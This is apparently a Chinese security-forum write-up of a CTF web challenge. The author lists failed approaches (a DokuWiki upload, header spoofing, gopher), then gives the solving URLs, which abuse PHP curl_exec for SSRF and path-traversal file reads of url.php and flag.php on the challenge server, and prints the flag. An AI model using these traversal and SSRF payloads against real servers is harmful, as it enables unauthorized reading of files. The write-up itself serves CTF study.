首页
社区
课程
招聘
1
[原创]第四题 飞蛾扑火 踩坑贴
发表于: 2022-5-17 13:08 4355

[原创]第四题 飞蛾扑火 踩坑贴

2022-5-17 13:08
4355

第0天,掉dokuwiki坑,文件都上传了,不解析拿不到shell;痛苦
第1天,掉header坑,改了十多种头,组合N个IP都没用;绝望
第2天,掉gopher坑,怎么绕都不行;无奈

 

结果发现是curl_exec的独特特性,还是知识面浅了,致敬http://cn-sec.com/archives/151034.html:

图片描述

 

=====================

  1. http://121.36.145.157:8044/
  2. 查看源码
  3. http://121.36.145.157:8044/phpinfo.php 得到物理路径
  4. http://121.36.145.157:8044/url.php?url=file://127.0.0.1/../../../../../var/www/html/url.php 得到源码
  5. http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php 得到flag
    图片描述
    flag{xxx_999()xx*@eeEEE}

[注意]看雪招聘,专注安全领域的专业人才平台!

最后于 2022-5-17 13:09 被VitoYane编辑 ,原因:
收藏
免费 1
支持
分享
赞赏记录
参与人
雪币
留言
时间
AEVE
为你点赞~
2022-5-18 14:39
最新回复 (0)
游客
登录 | 注册 方可回帖
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册